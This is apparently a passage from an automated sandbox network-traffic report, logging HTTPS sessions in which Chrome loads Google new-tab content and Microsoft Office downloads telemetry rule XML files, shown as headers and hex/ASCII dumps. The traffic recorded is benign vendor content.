                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                      Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                      Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                      Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                      Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 34 31 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75
                                                                                                                                                                                                                                                                                      Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700341,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC1390INData Raw: 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69
                                                                                                                                                                                                                                                                                      Data Ascii: ray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this.i
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC500INData Raw: 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 59 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 5a 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28
                                                                                                                                                                                                                                                                                      Data Ascii: ow Error(\"F\");};_.Zd\u003dfunction(a){if(Yd.test(a))return a};_.$d\u003dfunction(a){if(a instanceof _.Kd)if(a instanceof _.Kd)a\u003da.i;else throw Error(\"F\");else a\u003d_.Zd(a);return a};_.ae\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC546INData Raw: 32 31 62 0d 0a 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 75 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 51 64 28 5f 2e 4a 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 50 64 28 5f 2e 4a 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66
                                                                                                                                                                                                                                                                                      Data Ascii: 21b"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ce\u003dfunction(a,b,c){return _.ub(a,b,c,!1)!\u003d\u003dvoid 0};_.de\u003dfunction(a,b){return _.Qd(_.Jc(a,b))};_.S\u003dfunction(a,b){return _.Pd(_.Jc(a,b))};_.T\u003df
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC1390INData Raw: 38 30 30 30 0d 0a 28 3f 3a 5b 5c 5c 77 2b 2e 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 6c 65 2c 70 65 2c 68 65 3b 5f 2e 6a 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 68 65 28 5f 2e 69 65 28 61 29 29 3a 66 65 7c 7c 28 66 65 5c 75 30 30 33 64 6e 65 77 20 68 65 29 7d 3b 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f
                                                                                                                                                                                                                                                                                      Data Ascii: 8000(?:[\\w+.-]+:|[^:/?#]*(?:[/?#]|$))/i;var le,pe,he;_.je\u003dfunction(a){return a?new he(_.ie(a)):fe||(fe\u003dnew he)};_.ke\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db||do


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      65192.168.2.649778142.250.184.2284433524C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Version: 697526041
                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      66192.168.2.64978113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 0cd4e810-101e-0079-148c-3a5913000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095424Z-185f5d8b95c96jn4hC1NYCbgp80000000a50000000000xcb
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      67192.168.2.64977913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                      x-ms-request-id: ccb8f84a-f01e-00aa-75f2-3a8521000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095424Z-185f5d8b95c5lcmhhC1NYCsnsw0000000a6g000000003513
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      68192.168.2.64978313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 8d3bd1e1-301e-000c-7cf2-3a323f000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095424Z-r1d97b995777mdbwhC1TEBezag00000008sg000000000pqt
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      69192.168.2.64978213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                                                      x-ms-request-id: d35eaebc-501e-0064-178c-3a1f54000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095424Z-185f5d8b95cf7qddhC1NYC66an0000000a3g000000009rme
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
